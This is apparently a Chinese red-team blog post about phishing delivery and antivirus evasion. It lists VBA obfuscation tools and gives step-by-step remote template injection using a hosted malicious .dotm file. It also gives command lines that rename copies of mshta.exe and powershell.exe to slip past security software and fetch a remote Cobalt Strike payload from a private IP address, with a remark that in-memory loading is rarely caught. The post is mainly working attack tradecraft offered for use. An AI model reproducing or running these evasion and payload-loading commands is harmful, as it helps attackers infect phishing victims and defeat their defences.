红队APT-钓鱼投递篇&免杀方案&代码混淆&远程分离&文件逃逸&Office&CHM&LNK&捆绑

Ethan医生4周前信息收集48

 红队APT-文件后缀-Office分离

 红队APT-免杀方案-CHM&LNK

 红队APT-免杀方案-自解压&捆绑

免杀方案:

#Office文档

代码混淆

https://github.com/Pepitoh/VBad

https://github.com/outflanknl/EvilClippy

https://github.com/Accenture/Codecepticon

https://github.com/bobby-tablez/VBScrambler

 

分离加混淆

1、制作包含宏的恶意模版文件(.dotm)。

2、将恶意模版文件上传至服务器。如Github等公共文件平台。

3、新建并保存一个使用任意模版的docx文件。

解压docx文件,修改 word\_rels\settings.xml.rels文件的Target属性,将其指向部署恶意模版文件的服务器。

4、使用zip格式压缩文件,并重新命名后缀为docx。

5、重新打开docx文件,并启用宏。

 

做好生成的宏代码的混淆,制作好模版,上传至OSS,Github等公共文件平台

本地创建加载模版的文件,修改加载地址,远程加载混淆后的模版宏文件上线!

 

#LNK快捷方式

代码混淆+绕过文件监控

https://github.com/bobby-tablez/VBScrambler

CS生成的hta是vba代码模式 

解决1:mshta拦截

copy C:\Windows\System32\mshta.exe ms.exe

ms http://192.168.139.141:99/download/file.ext

C:\Windows\System32\cmd.exe /c copy C:\Windows\System32\mshta.exe ms.exe & ms http://192.168.139.141:99/download/file.ext ---- 火绒要是弄到内存里面查杀几率比较小 所以远程加载不会挂

解决2:vba混淆

https://github.com/bobby-tablez/VBScrambler

注意:生成出来后前后要加上html调用代码

 

CS生成的hta是powershell代码模式: 

解决1:mshta拦截

C:\Windows\System32\cmd.exe /c copy C:\Windows\System32\mshta.exe ms.exe & ms xxxx

解决2:powershell拦截

cmd /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p.exe & p.exe xxxxx

 

#自解压&捆绑打包

宿主文件免杀处理


标签: 钓鱼投递

相关文章

红队APT-钓鱼投递篇&网站钓鱼&工具克隆&数据异同步&手工导出修改&劫持用户&凭据窃取

➢ 红队APT-网页钓鱼-工具篇➢ 红队APT-网页钓鱼-手工篇➢ 红队APT-网页钓鱼-二维码#网页钓鱼:邮件中或其他方式配合网页钓鱼,以自行搭建的网页冒充真实站点,通...

红队APT-钓鱼投递篇&Office文档&宏代码对象&CVE漏洞&WORD&PPT&EXCEL&WPS类

➢ 红队APT-文件后缀-钓鱼伪装-RLO➢ 红队APT-电子书-CHM-加载JS&PS➢ 红队APT-快捷方式-LNK-加载&HTA➢ 红队A...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。